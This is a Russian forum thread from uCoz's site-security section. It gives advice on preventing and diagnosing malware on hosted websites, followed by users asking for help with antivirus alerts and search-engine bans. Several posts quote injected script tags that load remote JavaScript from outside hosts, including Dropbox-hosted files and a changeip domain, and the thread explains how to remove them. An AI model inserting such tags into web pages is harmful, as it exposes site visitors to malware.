Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04 21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте

  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    rjkzy
    Сообщений: 8
    Репутация: 0

    Сообщение # 211 | 13:02:09 03 Июл 2013
    Здравствуйте. Антивирус ESET Smart Security начал "вопить" на HTML/ScrInject.B.gen virus при входе на сайт гостем http://rubanovka.ucoz.ru/ , но при заходе пользователем подобного не происходит. Причину нашел бысто по исходному коду страницы - это скипт :

    <script type="text/javascript" src="http://spotsniper.ru/?pid=2&....z.ru%2F"></script>

    как я понял это скрипт рекламмы ucoz.ru - плата за бесплатный сайт, но почему ESET считает его вирусом и что делать мне не понятно, посоветуйте , что делать или поменяйте свой скрипт.
    bestjulia
    Сообщений: 2
    Репутация: 0

    Сообщение # 212 | 13:11:33 03 Июл 2013
    Цитата (webanet)
    bestjulia, панель управления - дизайн - управление дизайном - быстрая замена - в поле что заменить вставляете скрипт
    Пишет: " Не сделано ни одной замены. Проверьте правильность заменяемого кода." smile Кнопки соц сетей заменю, возможно именно в них дело. Благодарю вас.
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 213 | 13:12:54 03 Июл 2013
    rjkzy, антивирус блокирует именно этот адрес http://spotsniper.ru/?pid ?
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 214 | 13:15:59 03 Июл 2013
    bestjulia,
    Цитата
    Пишет: " Не сделано ни одной замены. Проверьте правильность заменяемого кода."
    чтобы там ни было вредоносного кода нет. соц. кнопки обязательно удалите и замените их яндексовскими. и обязательно смените пароль uID профиля. это обязательное условие ещё раз ссылка на инструкцию по замене пароля //forum.ucoz.ru/forum/45-52299-1
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    rjkzy
    Сообщений: 8
    Репутация: 0

    Сообщение # 215 | 13:24:14 03 Июл 2013
    Цитата
    [b]rjkzy[/b], антивирус блокирует именно этот адрес http://spotsniper.ru/?pid ?

    Нет, антивирус блокирует, когда в скрипте при переходе на любую страницу под "гостем" появляется
    http://spotsniper.ru/?pid=2&....z.ru%2F

    При заходе на сайт из закладки ссылка в скрипте выглядит по другому:
    http://spotsniper.ru/?pid=2&u0=aDGyttlq&ref=и антивирус не находит вируса
    а при входе как "пользователь" или кто другой этого скрипта вообще нету.
    Пробывал полностью убирать по очереди верхнюю и нижнюю часть сайта и первый и второй контейнеры - "страшилка" од ESET появляется.
    Сообщение отредактировал rjkzy - Среда, 03 Июл 2013, 13:44:57
    AlexLouis
    Сообщений: 1
    Репутация: 0

    Сообщение # 216 | 13:55:53 03 Июл 2013
    Доброго времени суток всем, подскажите пожалуйста что делать.
    Уже раз 5 на все мои сайты встраивается скрипт
    
    Код
    <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/ud3ne5xe8dcre8u/topbottom.txt"></script><script type="text/javascript" src="https://dl.dropboxusercontent.com/s/kuejhhvopk6nw6z/mysql.txt"></script>

    Я его удаляю, вычищаю все коды и он снова появляется где-то через неделю! Менял пароли от УИД, все равно снова и снова ломают и добавляют этот скрипт! Уже один сайт выпал из раздачи Яндекса. Помогите плз.
    Один из сайтов - http://blagoslovenie.ucoz.ru/
    ABEEZ
    Сообщений: 6
    Репутация: 0

    Сообщение # 217 | 14:23:34 03 Июл 2013
    Добрый день всем. Возникла проблема. Яндекс пишет.
    В коде части страниц Вашего сайта наши алгоритмы обнаружили код скрипта, меняющего окно результатов поиска на страницу другого сайта при переходе с поисковых машин. По этой причине мы были вынуждены временно исключить Ваш сайт из поиска.

    Один код я нашел, но Alarm говорит, что еще есть Iframe.WC и Exploit.HTML.IframeRef. Все перерыл. Не могу найти.
    Подскажите пожалуйста, где мне их искать. Сайт Spravkagorod.ru. Заранее спасибо.
    Вчерашнее сообщение. Ничего толкового не услышал.

    что такое аларм?

    и какой код вы удалили?

    Это все.

    Аларм антивирус, даже я это знаю.
    Нашел код...golink1.ru9/......и т. д., его удалил, яндекс не находит ничего, а антивирус пишет есть.
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 218 | 14:36:34 03 Июл 2013
    ABEEZ,
    Цитата
    яндекс не находит ничего
    да. яндекс после удаления вредоносного кода снял с вашего сайта метку о том, что он вредоносный. проблема с яндексом решена. а свои проблемы с онлайн проверками вам придется решать самостоятельно. пишите им в тех.поддержку пусть они трактуют результаты своих детищ как могут. возможно вы попали в черные списки пока вредоносный код был на сайте. в общем пишите им
    ничего особо ужасного в коде сайта не вижу. яндекс блокировку снял. а если проблема с онлайн сервисами, то туда и обращаемся
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    rjkzy
    Сообщений: 8
    Репутация: 0

    Сообщение # 219 | 14:39:48 03 Июл 2013
    Цитата
    Здравствуйте. Антивирус ESET Smart Security начал "вопить" на HTML/ScrInject.B.gen
    virus при входе на сайт гостем http://rubanovka.ucoz.ru/ , но при заходе
    пользователем подобного не происходит. Причину нашел бысто по исходному
    коду страницы - это скипт :

    <script type="text/javascript" src="http://spotsniper.ru/?pid=2&....z.ru%2F"></script>

    как я понял это скрипт рекламмы ucoz.ru - плата за бесплатный сайт, но
    почему ESET считает его вирусом и что делать мне не понятно, посоветуйте
    , что делать или поменяйте свой скрипт.

    Цитатаrjkzy, антивирус блокирует именно этот адрес http://spotsniper.ru/?pid ?
    Нет, антивирус блокирует, когда в скрипте при переходе на любую страницу под "гостем" появляется
    http://spotsniper.ru/?pid=2&....z.ru%2F

    При заходе на сайт из закладки ссылка в скрипте выглядит по другому:
    http://spotsniper.ru/?pid=2&u0=aDGyttlq&ref=и антивирус не находит вируса
    а при входе как "пользователь" или кто другой этого скрипта вообще нету.
    Пробывал полностью убирать по очереди верхнюю и нижнюю часть сайта и
    первый и второй контейнеры - "страшилка" од ESET появляется.




    И еще, если создать в блокноте страницу только из этого скрипта:
    <script type="text/javascript" src="http://spotsniper.ru/?pid=2&u0=aZRRSC&ref=http%3A%2F%2Frubanovka.ucoz.ru%2Fblog"></script>
    с расширением .htm то ESET выдает:
    http://s017.radikal.ru/i413/1307/e3/430a09071975.jpg
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 220 | 15:02:17 03 Июл 2013
    AlexLouis,
    Цитата
    Я его удаляю, вычищаю все коды и он снова появляется где-то через неделю!
    значит вы снова где-то сливаете свой пароль.
    сделайте так. панель управления - настройки - общие настройки - Вид кнопки uID авторизации: (третья настройка снизу) переставьте на старый вид

    далее пу - пользователи - добавить пользователя (правый верхний угол) - создаете пользователя - даете ему админские права - создаете сложный пароль - задаете мейл отличный от мейла текущего администратора - сохраняете

    у вас будет логин и пароль. будете входить на сайт по старой форме входа используя новый логин (который придумаете при создании нового пользователя) и пароль, который ему задали.

    далее пу - пользователи - найти пользователя - вставляете свой текущий админский ник на сайте - находите и забираете у него права. переведите текущий админский uID профиль в группу пользователи. нужно сделать так, чтобы админом на сайте остался только тот пользователь, которого вы создадите сами. то есть локальный

    и так для всех сайтов

    далее измените пароль администратора вебтопа
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    medved6969
    Сообщений: 7
    Репутация: 0

    Сообщение # 221 | 15:38:57 03 Июл 2013
    Добрый день!
    Помогите пожалуйста, антивирус Microsoft Security Essentials после входа на мой сайт http://medved6969.narod.ru/, находит троянскую программу, это происходит с яндекс браузера, через Google ничего ни находит. Клиент позвонил сказал , что не может зайти на наш сайт т.к. антивирус касперский блокирует, находит троян!!!
    Проверяли через яндекс веб мастер, пишут что Вредоносный код на сайте не обнаружен!
    Через Goоgle- Вредоносные программы на этом сайте не обнаружены.

    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 222 | 15:43:41 03 Июл 2013
    medved6969, удалите со всех страниц скрипт

    Код
    <script src="http://changeip.changeip.name/rsize.js"></script>


    он находится в самом конце
    переберите все страницы
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    medved6969
    Сообщений: 7
    Репутация: 0

    Сообщение # 223 | 16:07:36 03 Июл 2013
    Большое спасибо!!!
    bestwom
    Сообщений: 2
    Репутация: 0

    Сообщение # 224 | 17:57:42 03 Июл 2013
    webanet, Спасибо!
    Вечно я говорю «очень приятно с вами познакомиться», когда мне ничуть не приятно. … Но если хочешь жить с людьми, приходится говорить всякое.
    HERSER
    Сообщений: 4
    Репутация: 0

    Сообщение # 225 | 19:17:35 03 Июл 2013
    Добрый вечер webanet! Спасибо большое за совет. Из блока календарь убрал скрипт и все стало нормально. Аваст перестал выдавать надпись. Еще раз спасибо! Блок календаря исчез. Как теперь вставить безопасный виджет календаря?
    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Поиск: